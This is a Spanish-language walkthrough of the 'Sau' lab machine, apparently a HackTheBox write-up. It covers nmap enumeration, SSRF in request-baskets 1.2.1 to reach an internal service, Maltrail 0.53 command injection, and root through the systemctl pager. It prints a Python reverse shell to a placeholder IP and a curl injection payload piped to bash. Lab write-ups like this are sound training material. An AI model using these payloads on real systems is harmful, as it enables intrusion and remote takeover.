I"2A
<h2 id="enumeracion">Enumeracion</h2>

<p>Iniciamos con un escaneo de nmap con:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">nmap</span> <span class="o">-</span><span class="n">sS</span> <span class="o">-</span><span class="n">n</span> <span class="o">-</span><span class="no">Pn</span> <span class="o">-</span><span class="no">T4</span> <span class="o">--</span><span class="nb">open</span> <span class="o">-</span><span class="nb">p</span><span class="o">-</span> <span class="mf">10.10</span><span class="o">.</span><span class="mf">11.224</span>
</code></pre></div></div>

<ul>
  <li>
    <p>sS: haga un TCP SYN Scan el cual hace que el destino responda con un RST si el puerto esta cerrado, o con un SYN/ACK si esta abierto, y ademas para que vaya mas rapido</p>
  </li>
  <li>
    <p>n: para que no haga resolucion DNS y tarde menos el escaneo</p>
  </li>
  <li>
    <p>Pn: para evitar el descubrimiento de hosts</p>
  </li>
  <li>
    <p>open: para que solo muestre los puertos abiertos</p>
  </li>
  <li>
    <p>-p-: para que escanee todo el rango de puertos</p>
  </li>
</ul>

<p>Y nos reporto el puerto 22 (SSH) y 55555:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="no">PORT</span>      <span class="no">STATE</span> <span class="no">SERVICE</span>
<span class="mi">22</span><span class="o">/</span><span class="n">tcp</span>    <span class="nb">open</span>  <span class="n">ssh</span>
<span class="mi">55555</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">unknown</span>
</code></pre></div></div>

<p>Adicionalmente, si mostramos los puertos filtrados, nos saldra el puerto <strong>80</strong></p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mi">80</span><span class="o">/</span><span class="n">tcp</span>    <span class="n">filtered</span> <span class="n">http</span>
</code></pre></div></div>

<p>Ahora escanearemos para obtener mas informacion sobre la version y el servicio que estan corriendo bajo esos puertos. En el puerto 55555 nos mostrara que encontro informacion de un sitio web y el recurso <strong>web</strong>:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">nmap</span> <span class="o">-</span><span class="n">sCV</span> <span class="o">-</span><span class="n">p22</span><span class="p">,</span><span class="mi">22</span><span class="p">,</span><span class="mi">55555</span> <span class="mf">10.10</span><span class="o">.</span><span class="mf">11.224</span>
</code></pre></div></div>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="no">PORT</span>      <span class="no">STATE</span> <span class="no">SERVICE</span> <span class="no">VERSION</span>
<span class="mi">22</span><span class="o">/</span><span class="n">tcp</span>    <span class="nb">open</span>  <span class="n">ssh</span>     <span class="no">OpenSSH</span> <span class="mf">8.2</span><span class="n">p1</span> <span class="no">Ubuntu</span> <span class="mi">4</span><span class="n">ubuntu0</span><span class="o">.</span><span class="mi">7</span> <span class="p">(</span><span class="no">Ubuntu</span> <span class="no">Linux</span><span class="p">;</span> <span class="n">protocol</span> <span class="mf">2.0</span><span class="p">)</span>
<span class="o">|</span> <span class="n">ssh</span><span class="o">-</span><span class="ss">hostkey: 
</span><span class="o">|</span>   <span class="mi">3072</span> <span class="n">aa</span><span class="p">:</span><span class="mi">88</span><span class="p">:</span><span class="mi">67</span><span class="ss">:d7</span><span class="p">:</span><span class="mi">13</span><span class="p">:</span><span class="mi">3</span><span class="n">d</span><span class="p">:</span><span class="mi">08</span><span class="p">:</span><span class="mi">3</span><span class="n">a</span><span class="p">:</span><span class="mi">8</span><span class="n">a</span><span class="ss">:ce</span><span class="p">:</span><span class="mi">9</span><span class="n">d</span><span class="ss">:c4:dd:f3:e1:ed</span> <span class="p">(</span><span class="no">RSA</span><span class="p">)</span>
<span class="o">|</span>   <span class="mi">256</span> <span class="n">ec</span><span class="p">:</span><span class="mi">2</span><span class="n">e</span><span class="ss">:b1</span><span class="p">:</span><span class="mo">05</span><span class="p">:</span><span class="mi">87</span><span class="p">:</span><span class="mi">2</span><span class="n">a</span><span class="p">:</span><span class="mi">0</span><span class="n">c</span><span class="p">:</span><span class="mi">7</span><span class="n">d</span><span class="ss">:b1</span><span class="p">:</span><span class="mi">49</span><span class="p">:</span><span class="mi">87</span><span class="p">:</span><span class="mi">64</span><span class="p">:</span><span class="mi">95</span><span class="ss">:dc</span><span class="p">:</span><span class="mi">8</span><span class="n">a</span><span class="p">:</span><span class="mi">21</span> <span class="p">(</span><span class="no">ECDSA</span><span class="p">)</span>
<span class="o">|</span><span class="n">_</span>  <span class="mi">256</span> <span class="n">b3</span><span class="p">:</span><span class="mi">0</span><span class="n">c</span><span class="p">:</span><span class="mi">47</span><span class="ss">:fb:a2:f2</span><span class="p">:</span><span class="mi">12</span><span class="ss">:cc:ce</span><span class="p">:</span><span class="mi">0</span><span class="n">b</span><span class="p">:</span><span class="mi">58</span><span class="p">:</span><span class="mi">82</span><span class="p">:</span><span class="mi">0</span><span class="n">e</span><span class="p">:</span><span class="mi">50</span><span class="p">:</span><span class="mi">43</span><span class="p">:</span><span class="mi">36</span> <span class="p">(</span><span class="no">ED25519</span><span class="p">)</span>
<span class="mi">55555</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">unknown</span>
<span class="o">|</span> <span class="n">fingerprint</span><span class="o">-</span><span class="ss">strings: 
</span><span class="o">|</span>   <span class="no">FourOhFourRequest</span><span class="p">:</span> 
<span class="o">|</span>     <span class="no">HTTP</span><span class="o">/</span><span class="mf">1.0</span> <span class="mi">400</span> <span class="no">Bad</span> <span class="no">Request</span>
<span class="o">|</span>     <span class="no">Content</span><span class="o">-</span><span class="no">Type</span><span class="p">:</span> <span class="n">text</span><span class="o">/</span><span class="n">plain</span><span class="p">;</span> <span class="n">charset</span><span class="o">=</span><span class="n">utf</span><span class="o">-</span><span class="mi">8</span>
<span class="o">|</span>     <span class="no">X</span><span class="o">-</span><span class="no">Content</span><span class="o">-</span><span class="no">Type</span><span class="o">-</span><span class="no">Options</span><span class="p">:</span> <span class="n">nosniff</span>
<span class="o">|</span>     <span class="no">Date</span><span class="p">:</span> <span class="no">Tue</span><span class="p">,</span> <span class="mo">02</span> <span class="no">Jan</span> <span class="mi">2024</span> <span class="mi">22</span><span class="p">:</span><span class="mi">20</span><span class="p">:</span><span class="mo">01</span> <span class="no">GMT</span>
<span class="o">|</span>     <span class="no">Content</span><span class="o">-</span><span class="no">Length</span><span class="p">:</span> <span class="mi">75</span>
<span class="o">|</span>     <span class="n">invalid</span> <span class="n">basket</span> <span class="nb">name</span><span class="p">;</span> <span class="n">the</span> <span class="nb">name</span> <span class="n">does</span> <span class="n">not</span> <span class="n">match</span> <span class="ss">pattern: </span><span class="o">^</span><span class="p">[</span><span class="n">wd</span><span class="o">-</span><span class="n">_</span><span class="p">\</span><span class="o">.</span><span class="p">]{</span><span class="mi">1</span><span class="p">,</span><span class="mi">250</span><span class="p">}</span><span class="err">$</span>
<span class="o">|</span>   <span class="no">GenericLines</span><span class="p">,</span> <span class="no">Help</span><span class="p">,</span> <span class="no">Kerberos</span><span class="p">,</span> <span class="no">LDAPSearchReq</span><span class="p">,</span> <span class="no">LPDString</span><span class="p">,</span> <span class="no">RTSPRequest</span><span class="p">,</span> <span class="no">SSLSessionReq</span><span class="p">,</span> <span class="no">TLSSessionReq</span><span class="p">,</span> <span class="no">TerminalServerCookie</span><span class="p">:</span> 
<span class="o">|</span>     <span class="no">HTTP</span><span class="o">/</span><span class="mf">1.1</span> <span class="mi">400</span> <span class="no">Bad</span> <span class="no">Request</span>
<span class="o">|</span>     <span class="no">Content</span><span class="o">-</span><span class="no">Type</span><span class="p">:</span> <span class="n">text</span><span class="o">/</span><span class="n">plain</span><span class="p">;</span> <span class="n">charset</span><span class="o">=</span><span class="n">utf</span><span class="o">-</span><span class="mi">8</span>
<span class="o">|</span>     <span class="no">Connection</span><span class="p">:</span> <span class="n">close</span>
<span class="o">|</span>     <span class="no">Request</span>
<span class="o">|</span>   <span class="no">GetRequest</span><span class="p">:</span> 
<span class="o">|</span>     <span class="no">HTTP</span><span class="o">/</span><span class="mf">1.0</span> <span class="mi">302</span> <span class="no">Found</span>
<span class="o">|</span>     <span class="no">Content</span><span class="o">-</span><span class="no">Type</span><span class="p">:</span> <span class="n">text</span><span class="o">/</span><span class="n">html</span><span class="p">;</span> <span class="n">charset</span><span class="o">=</span><span class="n">utf</span><span class="o">-</span><span class="mi">8</span>
<span class="o">|</span>     <span class="no">Location</span><span class="p">:</span> <span class="sr">/web
|     Date: Tue, 02 Jan 2024 22:19:33 GMT
|     Content-Length: 27
|     href="/</span><span class="n">web</span><span class="s2">"&gt;Found&lt;/a&gt;. &lt;-- recurso de un sitio web
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Tue, 02 Jan 2024 22:19:34 GMT
|_    Content-Length: 0
</span></code></pre></div></div>

<h3 id="analisis-del-puerto-55555">Analisis del puerto 55555</h3>

<p>El puerto <strong>55555</strong> corresponde a un servidor web, por defecto nos manda al recurso <strong>web</strong> como se puede ver:</p>

<p><img src="/assets/img/sau/1.png" alt="" /></p>

<p>Si vemos en el footer del sitio, aparecera que esta usando <strong>request-baskets</strong> es una version</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Powered by request-baskets | Version: 1.2.1 
</code></pre></div></div>

<p>Al realizar una busqueda en google, podemos notar que es vulnerable a <strong>SSRF</strong></p>

<p><a href="https://www.akto.io/cves/CVE-2023-27163-requestbaskets-up-to-v-was-discovered-to-contain-a-serverside">https://www.akto.io/cves/CVE-2023-27163-requestbaskets-up-to-v-was-discovered-to-contain-a-serverside</a></p>

<p>Nos menciona que esta vulnerabilidad nos permite acceder a recursos internos a travez de una peticion a la API que ejecuta por detras <strong>request-baskets</strong></p>

<p>Analizando un poco mas las opciones del sitio, nos encontramos que podemos crear <strong>baskets</strong> y luego acceder a ellas mediante una URL. Al explorar una basket creada, podemos ver las solicitudes que se han echo asi como mas informacion, tambieb modificar algunas cosas de configuracion:</p>

<p><img src="/assets/img/sau/2.png" alt="" /></p>

<p>Tenemos la capacidad de hacer <strong>URL forwarding</strong>, es decir, hacer una redireccion a una URL.</p>

<h2 id="ssrf---access-port-80">SSRF - access port 80</h2>

<p><strong>SSRF:</strong> Server-side request forgery es una vulnerabilidad que permite a los atancantes realizar peticiones arbitrarias con el fin de acceder a servicios internos de la maquina.</p>

<p>Recapitulando, debido a que tenemos un <strong>SSRF</strong>, una redireccion URL, y el puerto 80 filtrado, podemos intentar modificar la configuracion de una <strong>basket</strong> de esta forma:</p>

<p><img src="/assets/img/sau/3.png" alt="" /></p>

<p>Lo que estaria pasando, es que cuando nosotros ingresemos a la URL que se genero cuando se crea un <strong>basket</strong>, esa peticion se estaria redireccionado a <strong>127.0.0.1:80</strong>, y como existe un SSRF, estariamos accediendo al servicio interno de la maquina que corre en <strong>127.0.0.1:80</strong>, lo cual indica que el SSRF se exploto correctamente como se puede ver</p>

<p><img src="/assets/img/sau/4.png" alt="" /></p>

<h2 id="rce---maltrail-v053">RCE - Maltrail (v0.53)</h2>

<p>Como se observa al final, se esta usando la version 0.53 de Maltrail, al realizar una busqueda rapida en google, nos daremos cuenta que que podemos explotar una vulnerabilidad para conseguir RCE, leyendo un poco de la vulnerabilidad, el parametro <strong>username</strong> del recurso <strong>login</strong> no se sanitiza correctamente, lo cual permie que podamos inyectar comandos, por lo cual podemos explotarla directamente usando curl:</p>

<p>Usaremos python para crear una revese shell:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">python3</span> <span class="o">-</span><span class="n">c</span> <span class="s">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("&lt;ip&gt;", &lt;puerto&gt;));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'</span>
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Recuerda cambiar la IP y el puerto
</code></pre></div></div>

<p>Luego lo codificaremos en b64 y usaremos este comando para enviar una peticion por POST y en el parametro <strong>username</strong> le encadenamos el comando</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">curl</span> <span class="o">-</span><span class="no">X</span> <span class="no">POST</span> <span class="s2">"http://10.10.11.224:55555/dihpeef/login"</span> <span class="o">-</span><span class="n">d</span> <span class="s2">"username=;$(echo "</span><span class="o">&lt;</span><span class="n">base</span> <span class="mi">64</span><span class="o">&gt;</span><span class="s2">" | base64 -d | bash)"</span>
</code></pre></div></div>

<p>La URL debe ser por una basket que hayas creado y obtendremos una conexion</p>

<p><img src="/assets/img/sau/5.png" alt="" /></p>

<p>(A este punto tenemos la flag de user)</p>

<h2 id="escalada-de-privilegios">Escalada de privilegios</h2>

<p>Si vemos los permisos de nivel de sudoers, podremos ver que el usuario puma puede ejecutar <strong>systemctl</strong> sin contraseña:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Matching Defaults entries for puma on sau:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
</code></pre></div></div>

<p>Debido a que cuando ejecutamos comando con systemctl usa una interfaz o vista similar a la del comando <strong>less</strong>, podemos inyectar comando al final de la vista de systemctl de la siguiente manera</p>

<p><img src="/assets/img/sau/6.png" alt="" /></p>

<p>Observa como al final de la vista o cuando termina la informacion mostrada, se le ingresa el comando que queremos ejecutar, en este caso fue <strong>!bash</strong> (ignorar el WARNING: terminal is not fully functional, no la hice fully interactive TTY)</p>

<p>Con eso hemos conseguido root</p>

<p>Eso ha sido todo, gracias por leer ❤</p>
:ET